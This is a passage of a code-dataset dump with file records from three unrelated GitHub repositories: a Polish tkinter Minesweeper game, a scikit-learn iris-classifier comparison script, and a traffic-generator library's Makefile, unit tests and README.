"alphanum_fraction": 0.5284311771392822,
"avg_line_length": 43.379310607910156,
"blob_id": "96f41e08e33f534ed2a5755aa28bbf204e3dce48",
"content_id": "13cd9862ff9419d94c5a805b76c8d213136729a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14188,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 319,
"path": "/minesweeper.py",
"repo_name": "tfisz/Minesweeper",
"src_encoding": "UTF-8",
"text": "from map import*\nfrom tkinter import messagebox\nfrom tkinter import *\nimport time\nimport threading\n\nSZEROKOSC: int = 16\nWYSOKOSC: int = 16\nLICZBA_MIN: int = 40\n\n\nclass Minesweeper:\n def __init__(self, root):\n with open(\"statystyki.txt\", 'r') as statystyki:\n self.lista_wynikow = [int(i) for i in statystyki] # wygrane / przegrane / czas\n\n self.root = root\n root.title(\"Minesweeper!\")\n\n menu = Menu(root)\n root.config(menu=menu)\n game_menu = Menu(menu)\n menu.add_cascade(label=\"Gra\", menu=game_menu)\n game_menu.add_command(label=\"Nowa\", command=self.reset)\n game_menu.add_command(label=\"Statystyki\", command=self.stats)\n game_menu.add_command(label=\"Wyjdź\", command=root.destroy)\n\n self.mapa = Mapa(WYSOKOSC, SZEROKOSC)\n self.mapa.wyznacz_mape(WYSOKOSC, SZEROKOSC, LICZBA_MIN)\n\n frame = Frame(root)\n frame.pack()\n\n self.zakryte = PhotoImage(file=\"zakryte.png\")\n self.puste = PhotoImage(file=\"puste.png\")\n self.bomba = PhotoImage(file=\"bomba.png\")\n self.flaga = PhotoImage(file=\"flaga.png\")\n self.brak_bomby = PhotoImage(file=\"brak_bomby.png\")\n self.numery = []\n for x in range(1, 9):\n self.numery.append(PhotoImage(file=str(x) + \".png\"))\n\n self.buttons = dict({})\n self.odkrytePola = 0\n self.postawioneFlagi = 0\n self.czyRozpoczeta = FALSE\n self.Czas = 0\n self.poczatkowyCzas = int(time.clock())\n self.odwiedzone = []\n\n x_coord, y_coord = 0, 0\n for i in range(WYSOKOSC*SZEROKOSC):\n\n if self.mapa.dane[x_coord][y_coord].sasiedzi == 9:\n mina = 1\n else:\n mina = 0\n\n # ustawiamy grafikę\n gfx = self.zakryte\n\n # 0 = Button widget\n # 1 = jeśli mina t/n (1/0)\n # 2 = stan (0 = niekliknięty, 1 = kliknięty, 2 = oflagowany)\n # 3 = id buttona\n # 4 = [x, y] położenie na planszy\n # 5 = sąsiedztwo\n self.buttons[i] = [Button(frame, image=gfx),\n mina,\n 0,\n i,\n [x_coord, y_coord],\n self.mapa.dane[x_coord][y_coord].sasiedzi]\n self.buttons[i][0].bind('<Button-1>', self.lclicked_wrapper(i))\n self.buttons[i][0].bind('<Button-3>', self.rclicked_wrapper(i))\n self.buttons[i][0].bind('<Double-Button-1>', self.dclicked_wrapper(i))\n # kalkulacja położenia\n x_coord += 1\n if x_coord == SZEROKOSC:\n x_coord = 0\n y_coord += 1\n\n # umieszczamy buttony na layoucie\n for key in self.buttons:\n self.buttons[key][0].grid(row=self.buttons[key][4][1], column=self.buttons[key][4][0])\n\n # dodajemy timer i licznik flag\n self.label2 = Label(frame, text=\"Czas: 0\")\n self.label2.grid(row=WYSOKOSC, column=0, columnspan=3)\n\n self.label3 = Label(frame, text=\"Pozostało: \" + str(LICZBA_MIN-self.postawioneFlagi))\n self.label3.grid(row=WYSOKOSC, column=SZEROKOSC-3, columnspan=3)\n\n def lclicked_wrapper(self, key):\n return lambda Button: self.lclicked(self.buttons[key])\n\n def rclicked_wrapper(self, key):\n return lambda Button: self.rclicked(self.buttons[key])\n\n def dclicked_wrapper(self, key):\n return lambda Button: self.dclicked(self.buttons[key])\n\n def lclicked(self, button_data):\n if button_data[1] == 1: # jeśli mina\n # pokaż wszystkie miny\n for key in self.buttons:\n if self.buttons[key][1] != 1 and self.buttons[key][2] == 2:\n self.buttons[key][0].config(image=self.brak_bomby)\n if self.buttons[key][1] == 1 and self.buttons[key][2] != 2:\n self.buttons[key][0].config(image=self.bomba)\n # koniec gry\n self.przegrana()\n elif button_data[1] == 0 and button_data[2] == 0:\n # zmień ikonę\n if self.czyRozpoczeta == FALSE:\n self.czyRozpoczeta = TRUE\n t = threading.Thread(target=self.timer)\n t.start()\n\n if button_data[5] == 0:\n self.czysc_puste(button_data[3], TRUE)\n else:\n button_data[0].config(image=self.numery[button_data[5] - 1])\n button_data[2] = 1\n self.odkrytePola += 1\n\n if self.odkrytePola == WYSOKOSC*SZEROKOSC - LICZBA_MIN:\n self.wygrana()\n\n def rclicked(self, button_data):\n # jeśli niekliknięte, stawiamy flagę\n if button_data[2] == 0:\n button_data[0].config(image=self.flaga)\n button_data[2] = 2\n button_data[0].unbind('<Button-1>')\n\n self.postawioneFlagi += 1\n self.update_flags()\n # jeśli oflagowane, zabieramy flagę\n elif button_data[2] == 2:\n button_data[0].config(image=self.zakryte)\n button_data[2] = 0\n button_data[0].bind('<Button-1>', self.lclicked_wrapper(button_data[3]))\n\n self.postawioneFlagi -= 1\n self.update_flags()\n\n def dclicked(self, button_data): # funkcja, która po podwójnym klkiknięciu sprawdza czy liczba otaczających flag\n # zgadza się z grafiką po czym odkrywa otoczenie pola\n if button_data[2] == 1 and button_data[5] != 0:\n x_coord, y_coord = button_data[4]\n flag_counter = 0\n for key in self.buttons:\n if self.buttons[key][4] == [x_coord - 1, y_coord - 1] and self.buttons[key][2] == 2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord, y_coord - 1] and self.buttons[key][2] == 2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord + 1, y_coord - 1] and self.buttons[key][2] == 2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord - 1, y_coord] and self.buttons[key][2] == 2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord + 1, y_coord] and self.buttons[key][2] == 2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord - 1, y_coord + 1] and self.buttons[key][2] == 2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord, y_coord + 1] and self.buttons[key][2] == 2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord + 1, y_coord + 1] and self.buttons[key][2] == 2:\n flag_counter += 1\n\n if flag_counter == button_data[5]:\n key = button_data[3]\n if x_coord > 0 and y_coord > 0 and self.buttons[key-SZEROKOSC-1][2] == 0:\n self.lclicked(self.buttons[key-SZEROKOSC-1])\n if y_coord > 0 and self.buttons[key-SZEROKOSC][2] == 0:\n self.lclicked(self.buttons[key - SZEROKOSC])\n if x_coord < SZEROKOSC-1 and y_coord > 0 and self.buttons[key-SZEROKOSC+1][2] == 0:\n self.lclicked(self.buttons[key - SZEROKOSC+1])\n if x_coord > 0 and self.buttons[key-1][2] == 0:\n self.lclicked(self.buttons[key - 1])\n if x_coord < SZEROKOSC-1 and self.buttons[key+1][2] == 0:\n self.lclicked(self.buttons[key + 1])\n if x_coord > 0 and y_coord < WYSOKOSC-1 and self.buttons[key+SZEROKOSC-1][2] == 0:\n self.lclicked(self.buttons[key + SZEROKOSC - 1])\n if y_coord < WYSOKOSC-1 and self.buttons[key+SZEROKOSC][2] == 0:\n self.lclicked(self.buttons[key + SZEROKOSC])\n if x_coord < SZEROKOSC-1 and y_coord < WYSOKOSC-1 and self.buttons[key+SZEROKOSC+1][2] == 0:\n self.lclicked(self.buttons[key + SZEROKOSC + 1])\n\n def czysc_puste(self, key, allowedClear): # funkcja która w przypadku gdy natrafimy na 0 odkrywa całe jego otoczenie\n if self.buttons[key][2] == 0 and allowedClear == TRUE and self.buttons[key][1] == 0 and key not in self.odwiedzone:\n\n self.odwiedzone.append(key)\n self.buttons[key][2] = 1\n if self.buttons[key][5] == 0:\n self.buttons[key][0].config(image = self.puste)\n else:\n self.buttons[key][0].config(image=self.numery[self.buttons[key][5] - 1])\n\n self.odkrytePola += 1\n\n if self.odkrytePola == WYSOKOSC*SZEROKOSC-LICZBA_MIN:\n self.wygrana()\n\n if self.buttons[key][5] == 0:\n allowedClear = TRUE\n else:\n allowedClear = FALSE\n\n x_coord, y_coord = self.buttons[key][4]\n if y_coord > 0 and x_coord > 0:\n self.czysc_puste(key-SZEROKOSC-1, allowedClear)\n if y_coord > 0:\n self.czysc_puste(key-SZEROKOSC, allowedClear)\n if y_coord > 0 and x_coord < SZEROKOSC-1:\n self.czysc_puste(key-SZEROKOSC+1, allowedClear)\n if x_coord > 0:\n self.czysc_puste(key-1, allowedClear)\n if x_coord < SZEROKOSC-1:\n self.czysc_puste(key+1, allowedClear)\n if y_coord < WYSOKOSC-1 and x_coord>0:\n self.czysc_puste(key+SZEROKOSC-1, allowedClear)\n if y_coord < WYSOKOSC-1:\n self.czysc_puste(key+SZEROKOSC, allowedClear)\n if y_coord < WYSOKOSC-1 and x_coord<SZEROKOSC-1:\n self.czysc_puste(key+SZEROKOSC+1, allowedClear)\n\n def przegrana(self):\n self.czyRozpoczeta = FALSE\n self.lista_wynikow[1] += 1\n for key in self.buttons:\n self.buttons[key][0].unbind('<Button-1>')\n self.buttons[key][0].unbind('<Button-3>')\n self.buttons[key][0].unbind('<Double-Button-1>')\n messagebox.showinfo(\"Koniec gry\", \"Przegrałeś!\"\n \"\\nLiczba wygranych: \"+str(self.lista_wynikow[0])+\n \"\\nLiczba przegranych: \"+str(self.lista_wynikow[1]))\n\n for i in range(3):\n self.lista_wynikow[i] = str(self.lista_wynikow[i])\n with open(\"statystyki.txt\", 'w') as statystyki:\n statystyki.write('\\n'.join(self.lista_wynikow))\n\n def wygrana(self):\n self.czyRozpoczeta = FALSE\n self.lista_wynikow[0] += 1\n if self.Czas < self.lista_wynikow[2]: self.lista_wynikow[2] = self.Czas\n for key in self.buttons:\n self.buttons[key][0].unbind('<Button-1>')\n self.buttons[key][0].unbind('<Button-3>')\n self.buttons[key][0].unbind('<Double-Button-1>')\n messagebox.showinfo(\"Koniec gry\", \"Gratulacje, wygrana!\"\n \"\\nLiczba wygranych: \" + str(self.lista_wynikow[0]) +\n \"\\nLiczba przegranych: \" + str(self.lista_wynikow[1]))\n\n for i in range(3):\n self.lista_wynikow[i] = str(self.lista_wynikow[i])\n with open(\"statystyki.txt\", 'w') as statystyki:\n statystyki.write('\\n'.join(self.lista_wynikow))\n\n def update_flags(self):\n self.label3.config(text=\"Pozostało: \" + str(LICZBA_MIN-self.postawioneFlagi))\n\n def timer(self):\n while self.czyRozpoczeta == TRUE:\n self.label2.config(text=\"Czas: \" + str(self.Czas))\n self.Czas += 1\n time.sleep(1)\n\n def reset(self):\n self.lista_wynikow = []\n with open(\"statystyki.txt\", 'r') as statystyki:\n self.lista_wynikow = [int(i) for i in statystyki] # wygrane / przegrane / pocz/ zaaw/ trudny\n\n self.odkrytePola = 0\n self.postawioneFlagi = 0\n self.update_flags()\n self.czyRozpoczeta = FALSE\n self.Czas = 0\n self.odwiedzone = []\n\n self.mapa = Mapa(WYSOKOSC, SZEROKOSC)\n self.mapa.wyznacz_mape(WYSOKOSC, SZEROKOSC, LICZBA_MIN)\n x_coord, y_coord = 0, 0\n for i in range(SZEROKOSC*WYSOKOSC):\n self.buttons[i][0].config(image=self.zakryte)\n self.buttons[i][2] = 0\n self.buttons[i][5] = self.mapa.dane[x_coord][y_coord].sasiedzi\n self.buttons[i][1] = 0\n self.buttons[i][0].bind('<Button-1>', self.lclicked_wrapper(i))\n self.buttons[i][0].bind('<Button-3>', self.rclicked_wrapper(i))\n self.buttons[i][0].bind('<Double-Button-1>', self.dclicked_wrapper(i))\n if self.mapa.dane[x_coord][y_coord].sasiedzi == 9:\n self.buttons[i][1] = 1\n\n x_coord += 1\n if x_coord == SZEROKOSC:\n x_coord = 0\n y_coord += 1\n\n def stats(self):\n if self.czyRozpoczeta == FALSE:\n for i in range(3):\n self.lista_wynikow[i] = int(self.lista_wynikow[i])\n if self.lista_wynikow[0] == 0 and self.lista_wynikow[1] == 0:\n messagebox.showinfo(\"Statystyki\", \"\\nLiczba wygranych: 0\" +\n \"\\nLiczba przegranych: 0\" +\n \"\\nProcent wygranych: 0%\" +\n \"\\nNajlepszy czas: brak\")\n elif self.lista_wynikow[0] == 0 and self.lista_wynikow[1] != 0:\n messagebox.showinfo(\"Statystyki\", \"\\nLiczba wygranych: 0\" +\n \"\\nLiczba przegranych: \" + str(self.lista_wynikow[1]) +\n \"\\nProcent wygranych: 0%\" +\n \"\\nNajlepszy czas: brak\")\n else:\n messagebox.showinfo(\"Statystyki\", \"\\nLiczba wygranych: \" + str(self.lista_wynikow[0]) +\n \"\\nLiczba przegranych: \" + str(self.lista_wynikow[1]) +\n \"\\nProcent wygranych: \" + str(int(100*self.lista_wynikow[0]/(self.lista_wynikow[0]+self.lista_wynikow[1]))) + \"%\" +\n \"\\nNajlepszy czas: \" + str(self.lista_wynikow[2]))\n"
},
{
"alpha_fraction": 0.4158986210823059,
"alphanum_fraction": 0.4447004497051239,
"avg_line_length": 42.42499923706055,
"blob_id": "53a87a218e89a3c4d178dd0ff4c7a4fc335a0363",
"content_id": "c4aa8fc3a25c8b42e18efd3c06c409169ff336c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1736,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 40,
"path": "/map.py",
"repo_name": "tfisz/Minesweeper",
"src_encoding": "UTF-8",
"text": "from random import randint\n\nBOMBA: int = 9\n\n\nclass Pole:\n def __init__(self):\n self.sasiedzi = 0\n\n\nclass Mapa(Pole):\n def __init__(self, x, y):\n self.dane = [[Pole() for i in range(x)] for i in range(y)]\n\n def wyznacz_mape(self, x, y, liczba_min):\n while liczba_min > 0:\n pozycja = randint(0, (x * y)-1)\n if self.dane[int(pozycja / x)][pozycja % x].sasiedzi != BOMBA:\n self.dane[int(pozycja/x)][pozycja % x].sasiedzi = BOMBA\n liczba_min -= 1\n\n for i in range(y):\n for j in range(x):\n if self.dane[i][j].sasiedzi == BOMBA:\n if i > 0 and j > 0 and self.dane[i - 1][j - 1].sasiedzi != BOMBA:\n self.dane[i-1][j-1].sasiedzi += 1\n if j > 0 and self.dane[i][j - 1].sasiedzi != BOMBA:\n self.dane[i][j-1].sasiedzi += 1\n if i < y-1 and j > 0 and self.dane[i + 1][j - 1].sasiedzi != BOMBA:\n self.dane[i+1][j-1].sasiedzi += 1\n if i > 0 and self.dane[i - 1][j].sasiedzi != BOMBA:\n self.dane[i-1][j].sasiedzi += 1\n if i < y-1 and self.dane[i + 1][j].sasiedzi != BOMBA:\n self.dane[i+1][j].sasiedzi += 1\n if i > 0 and j < x-1 and self.dane[i - 1][j + 1].sasiedzi != BOMBA:\n self.dane[i-1][j+1].sasiedzi += 1\n if j < x-1 and self.dane[i][j + 1].sasiedzi != BOMBA:\n self.dane[i][j+1].sasiedzi += 1\n if i < y-1 and j < x-1 and self.dane[i + 1][j + 1].sasiedzi != BOMBA:\n self.dane[i+1][j+1].sasiedzi += 1"
}
] | 3 |
naveennvrgup/nns-ml-projects
|
https://github.com/naveennvrgup/nns-ml-projects
|
508b9edb59b764a0364abd0cd5ae630af0f6b8f4
|
b545b3fc90a9acc7264c1fb0e3650a69662ec6b5
|
3150e53b7f0045e2b1d6a074b3b7211dd5c98d8c
|
refs/heads/master
| 2020-04-15T01:38:13.747215 | 2019-11-26T17:23:38 | 2019-11-26T17:23:38 | 164,284,368 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6800947785377502,
"alphanum_fraction": 0.741706132888794,
"avg_line_length": 21.052631378173828,
"blob_id": "7d8c459c5d160d7e0355ac5be6913ae20b8b531f",
"content_id": "7e0dd8805805cb6ee8ebb39a4b4233904cf384f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 19,
"path": "/README.md",
"repo_name": "naveennvrgup/nns-ml-projects",
"src_encoding": "UTF-8",
"text": "# ML Experiments\n\nThis repo is meant to a online backup of the Machine Learning models I experiment with.\n\n### ML Models:\n1. Black friday \n1. cat and dogs \n1. irih flowers \n1. student performence\n\nThe models are trained using keras apis with tensorflow backend.\n\n### My laptop specifications:\ni5-6200U CPU @ 2.3GHz 4 cores \n8GB RAM \n256GB SSD \nNividia 940MX graphics card \n720p screen \nUbuntu 18.0.6 Bionic Beaver \n\n"
},
{
"alpha_fraction": 0.6838955283164978,
"alphanum_fraction": 0.6882480978965759,
"avg_line_length": 28.015872955322266,
"blob_id": "2beb6d297271b4d47ff2fbb66f31c7a11346fb46",
"content_id": "93df6c03f60a7be63986721f3211cf93bb4bd0c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1838,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 63,
"path": "/irih_flowers/irish.py",
"repo_name": "naveennvrgup/nns-ml-projects",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\ndataset = pd.read_csv('irish.txt')\nx=dataset.iloc[:,:3].values\ny=dataset.iloc[:,4].values\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nx=sc.fit_transform(x)\n\n# classifiers \nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.gaussian_process.kernels import RBF\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import cross_val_score, cross_val_predict\n\ncnames = [\n 'logistic',\n 'kneighbours',\n 'svc',\n 'decisiontree',\n 'randomforest',\n 'adaboost',\n 'gaussiannb',\n 'quadraticdiscriminationanalysis',\n ]\n\ncfiers = [\n LogisticRegression(multi_class='auto',solver='lbfgs'),\n KNeighborsClassifier(),\n SVC(gamma='auto'),\n DecisionTreeClassifier(),\n RandomForestClassifier(n_estimators=100),\n AdaBoostClassifier(),\n GaussianNB(),\n QuadraticDiscriminantAnalysis()\n ]\n\n\nbaccu=0\nbcfier='letssee'\n\nfor i in range(len(cnames)):\n print(cnames[i])\n accs = cross_val_score(cfiers[i],x,y,cv=15)\n print(accs.mean(),accs.std())\n if accs.mean()>baccu:\n baccu=accs.mean()\n bcfier=cnames[i]\n print()\n \nprint('best classifier for the dataset')\nprint(baccu,bcfier)\n \n \n"
},
{
"alpha_fraction": 0.700440526008606,
"alphanum_fraction": 0.7136563658714294,
"avg_line_length": 24.11111068725586,
"blob_id": "ea3976f7e5496665cce318aaf2108b42676d8f76",
"content_id": "b63a3bd91a0dc0f026a7251b2de6103b2449fa0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 227,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 9,
"path": "/.spyproject/workspace.ini",
"repo_name": "naveennvrgup/nns-ml-projects",
"src_encoding": "UTF-8",
"text": "[workspace]\nrestore_data_on_startup = True\nsave_data_on_exit = True\nsave_history = True\nsave_non_project_files = False\n\n[main]\nversion = 0.1.0\nrecent_files = ['C:\\\\Users\\\\naveen\\\\Desktop\\\\ml_projects\\\\irih_flowers\\\\irish.py']\n\n"
}
] | 3 |
feng891005/PyTrafficGenerator
|
https://github.com/feng891005/PyTrafficGenerator
|
0fc9d852dd77896729cbfb688579cceffe83fd8e
|
612f838ad6fd6fe65eba5a5ca1c2cc973dc14a29
|
d98ea1ea671813b3abdfc41bd4e46ebb49a756e4
|
refs/heads/master
| 2023-04-05T19:03:47.282278 | 2021-04-19T10:43:41 | 2021-04-19T10:43:41 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6938775777816772,
"alphanum_fraction": 0.7030612230300903,
"avg_line_length": 24.789474487304688,
"blob_id": "540debd6d4125c8a18496e7bdfffe909b90082ce",
"content_id": "4e074f70c5ad0d4ac7e09972e81b61a1765c3969",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 980,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 38,
"path": "/Makefile",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "#\n# Makefile to build and upload to local pypi servers.\n# To upload to pypi.org use plain twine upload.\n#\n# todo: add support to upload to pypi.\n# todo: add support to install from pypi.\n#\n\nrepo=localhost\nuser=pypiadmin\npassword=pypiadmin\n\nhelp:\n\t@echo 'install: install pip requirements'\n\t@echo 'test: test the package'\n\t@echo 'build: build the package'\n\t@echo 'upload: create and upload the package to local pypi index'\n\t@echo ' takes the following params:'\n\t@echo ' repo=repository-url, default localhost:8086'\n\t@echo ' user=user name, default pypiadmin'\n\t@echo ' password=user password, default pypiadmin'\n\ninstall:\n\tpython -m pip install -U pip\n\tpip install -U -r requirements-dev.txt\n\n.PHONY: build\nbuild:\n\tmake test\n\trm -rf dist/*\n\tpython setup.py bdist_wheel\n\nupload:\n\tmake build\n\ttwine upload --repository-url http://$(repo):8036 --user $(user) --password $(password) dist/*\n\ntest:\n\tpytest --cache-clear --flake8 --isort --cov=trafficgenerator\n"
},
{
"alpha_fraction": 0.5763255953788757,
"alphanum_fraction": 0.6004728078842163,
"avg_line_length": 36.01250076293945,
"blob_id": "3b2df995f18d5ff0d263ae86c83d5bfefe641f92",
"content_id": "3ad3e488f028ff77589809dea872c1c325c3db0e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5922,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 160,
"path": "/tests/test_object.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTests for basic TGN object operations.\n\"\"\"\nfrom typing import Dict, List, Type\n\nimport pytest\n\nfrom trafficgenerator.tgn_app import TgnApp\nfrom trafficgenerator.tgn_object import TgnObject, TgnObjectsDict, TgnSubStatsDict\nfrom trafficgenerator.tgn_utils import TgnError, flatten, is_false, is_ip, is_local_host, is_true\n\n\[email protected]()\ndef root():\n \"\"\" Yields dummy objects hierarchy. \"\"\"\n root = TgnTestObject(objRef='root1', objType='root', parent=None)\n root.api = None\n root.logger = None\n root.leaf1 = TgnTestObject(objRef='leaf1', objType='leaf', parent=root)\n root.node1 = TgnTestObject(objRef='node1', objType='node', parent=root, name='name1')\n root.node2 = TgnTestObject(objRef='node2', objType='node', parent=root, name='name2')\n root.node1.node11 = TgnTestObject(objRef='node11', objType='node', parent=root.node1, name='name11')\n root.node1.node12 = TgnTestObject(objRef='node12', objType='node', parent=root.node1, name='name12')\n root.node1.leaf11 = TgnTestObject(objRef='leaf11', objType='leaf', parent=root.node1)\n yield root\n\n\nclass TgnTestObject(TgnObject):\n \"\"\" Mock test object. \"\"\"\n\n def get_attributes(self) -> Dict[str, str]:\n \"\"\" Returns object data as its attributes. \"\"\"\n return self._data\n\n def get_attribute(self, attribute: str) -> str:\n \"\"\" Returns single data entry as a single attribute. \"\"\"\n return self._data[attribute]\n\n def get_children(self, *types: List[str]) -> List[TgnObject]:\n \"\"\" Returns all objects as children. \"\"\"\n return list(self.objects.values())\n\n def _create(self, **attributes: Dict[str, object]) -> str:\n \"\"\" todo: add implementation and test. \"\"\"\n pass\n\n def get_name(self) -> str:\n \"\"\" todo: add implementation and test. \"\"\"\n pass\n\n def get_objects_from_attribute(self, attribute: str) -> List[TgnObject]:\n \"\"\" todo: add implementation and test. \"\"\"\n pass\n\n def get_obj_class(self, obj_type: str) -> Type[TgnObject]:\n \"\"\" todo: add implementation and test. \"\"\"\n pass\n\n\nclass TestTgnObject:\n\n def test_app(self):\n TgnApp(None, None)\n\n def test_objects_tree(self, root):\n \"\"\" Test object search operations. \"\"\"\n\n assert root.ref == 'root1'\n assert root.type == 'root'\n assert root.name == 'root1'\n assert root.node1.ref == 'node1'\n assert root.node1.type == 'node'\n assert root.node1.name == 'name1'\n assert root.node1.parent == root\n\n assert root.get_object_by_name('name2') == root.node2\n assert len(root.get_objects_by_type('node')) == 2\n assert len(root.get_objects_or_children_by_type('node')) == 2\n assert root.get_object_or_child_by_type('node') == root.node1\n assert root.get_object_by_type('node') == root.node1\n assert len(root.get_objects_by_type('no_such_object')) == 0\n assert root.get_object_by_ref('leaf1') == root.leaf1\n\n assert len(root.get_objects_by_type_in_subtree('node')) == 4\n assert len(root.get_objects_by_type_in_subtree('leaf')) == 2\n assert len(root.node1.node11.get_objects_by_type_in_subtree('node')) == 0\n\n assert str(root) == root.name\n\n assert len(root.get_objects_with_attribute(obj_type='node', attribute='name', value='name1')) == 1\n\n assert len(root.get_children()) == 3\n assert root.get_child() == root.leaf1\n\n def test_objects_dict(self, root):\n objects_dict = TgnObjectsDict()\n objects_dict[root.node1] = TgnObjectsDict()\n objects_dict[root.node1][root.node1.node11] = 'node 11 entry'\n objects_dict[root.node1][root.node1.node12] = 'node 12 entry'\n objects_dict[root.node1][root.node1.leaf11] = TgnObjectsDict()\n objects_dict[root.node2] = 'node 2 entry'\n with pytest.raises(TgnError) as _:\n objects_dict.__setitem__('invalid key', '')\n assert objects_dict[root.node2] == 'node 2 entry'\n assert objects_dict[root.node2.name] == 'node 2 entry'\n assert objects_dict[root.node2.ref] == 'node 2 entry'\n print(objects_dict.dumps())\n\n def test_sub_dict(self, root):\n sub_stats_dict = TgnSubStatsDict()\n sub_stats_dict[root.node1] = {'a': 1, 'b': 2}\n assert sub_stats_dict[root.node1]['a'] == 1\n assert sub_stats_dict[root.node1.name]['a'] == 1\n assert sub_stats_dict['a'] == 1\n sub_stats_dict[root.node2] = {'c': 3, 'd': 4}\n assert sub_stats_dict[root.node1]['a'] == 1\n assert sub_stats_dict[root.node2]['c'] == 3\n with pytest.raises(KeyError) as _:\n sub_stats_dict.__getitem__('a')\n\n\nclass TestTgnUtils:\n\n def test_true_false(self):\n \"\"\" Test TGN true and false values. \"\"\"\n\n for false_stc in ('False', 'false', '0', 'null', 'NONE', 'none', '::ixnet::obj-null'):\n assert(is_false(false_stc))\n assert(not is_true(false_stc))\n\n for true_str in ('True', 'TRUE', '1'):\n assert(is_true(true_str))\n assert(not is_false(true_str))\n\n def test_localhost(self):\n \"\"\" Test TGN localhost values. \"\"\"\n\n for location in ('127.0.0.1', 'localhost', 'Localhost/1/1', '//(Offline)/1/1', 'null'):\n assert(is_local_host(location))\n\n for location in ('1.2.3.4', 'hostname', '192.168.1.1/1/2'):\n assert(not is_local_host(location))\n\n def test_ips(self):\n \"\"\" Test TGN IP values. \"\"\"\n\n for ip in ('IPV4', 'ipv6', 'ipv4if', 'IPV6IF'):\n assert(is_ip(ip))\n\n for ip in ('mac', 'bla'):\n assert(not is_ip(ip))\n\n def test_flatten(self):\n nl = [1, [11, [111]], 2, [22]]\n assert(len(nl) == 4)\n assert(type(nl[1]) == list)\n assert(type(nl[2]) == int)\n assert(len(flatten(nl)) == 5)\n assert(type(flatten(nl)[1]) == int)\n assert(type(flatten(nl)[2]) == int)\n"
},
{
"alpha_fraction": 0.7247191071510315,
"alphanum_fraction": 0.7407704591751099,
"avg_line_length": 31.789474487304688,
"blob_id": "167253871fec16f309aebc7971eef04fb056e791",
"content_id": "017de7b5651ae216adecf8a88fe5ed6523361f33",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1246,
"license_type": "permissive",
"max_line_length": 161,
"num_lines": 38,
"path": "/README.md",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "[](https://www.python.org/downloads/release/downloads/)\n[](https://opensource.org/licenses/Apache-2.0)\n\n\nBase Python OO API for traffic generators (Ixia, Spirent, Xena, TRex etc.).\n\nThe package provides\n\n- Common utilities.\n- Base class for all Python OO traffic generator classes.\n- Base Python wrapper over Tcl - the lowest common denominator API for TGNs is Tcl (also the inheriting packages still have some legacy code implemented in Tcl).\n\nUsers\n-----\nTo install pytrafficgen for users, just pip install it::\n\n $ pip install pytrafficgen\n\nDevelopers\n----------\nTo get pytrafficgen for developers, just clone it\n\n```bash\n$ git clone https://github.com/shmir/PyTrafficGenerator.git\n```\n\nTo upload a new version to local pypi::\n```bash\n$ make upload repo=REPO user=USER_NAME password=PASSWORD\n```\n\nDocumentation\n-------------\nhttp://pytrafficgenerator.readthedocs.io/en/latest/\n\nContact\n-------\nFeel free to contact me with any question or feature request at [email protected]\n"
},
{
"alpha_fraction": 0.6266094446182251,
"alphanum_fraction": 0.6364193558692932,
"avg_line_length": 26.644067764282227,
"blob_id": "dccfede5fcb0442484738dcecfcca9a4c503e79b",
"content_id": "fa9bc263147513d66c07abc5f69a48a11db39014",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1631,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 59,
"path": "/tests/test_tcl.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
